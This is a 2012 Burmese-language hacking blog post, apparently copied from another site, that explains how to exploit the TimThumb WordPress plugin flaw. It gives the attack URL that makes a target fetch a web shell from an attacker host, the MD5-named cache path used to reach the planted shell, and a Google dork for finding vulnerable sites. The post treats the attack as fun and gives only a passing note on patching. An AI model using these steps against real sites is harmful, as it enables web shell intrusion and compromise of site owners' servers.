Monday, April 2, 2012

Timthumb Vuln & How can hack?


WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္
3434FF35A3614422F97F13251661A890 ေပါ့ဗ်ာ
အင္း ဒါဆို www.target.com/…/cach/src=3434FF35A3614422F97F13251661A890.php ကိုသြားၾကည့္လိုက္ရင္ ကၽြန္ေတာ္တို႔ တင္ထားတဲ့ SHell ၾကီးတင္လာပါမယ္ ကဲ ေပ်ာ္စရာၾကီးေနာ္
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/thumb.php နဲ႔သြားရပါ့မယ္
ဥပမာ www.target.com/fordreporter/scripts/thumb.php ေပါ့ဗ်ာ Upload လုပ္ခ်င္ရင္ www.target.com/fordreporter/scripts/thumb.php?src=www.hacker.com/shell.php Shell ကိုသြားၾကည့္ရင္ www.target.com/fordreporter/scripts/cache/src=3434FF35A3614422F97F13251661A890.php
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/thumb.php ဆိုျပီးရွာရပါ့မယ္
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္

post by ghostarea.net
copy by Me ..........he...he

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology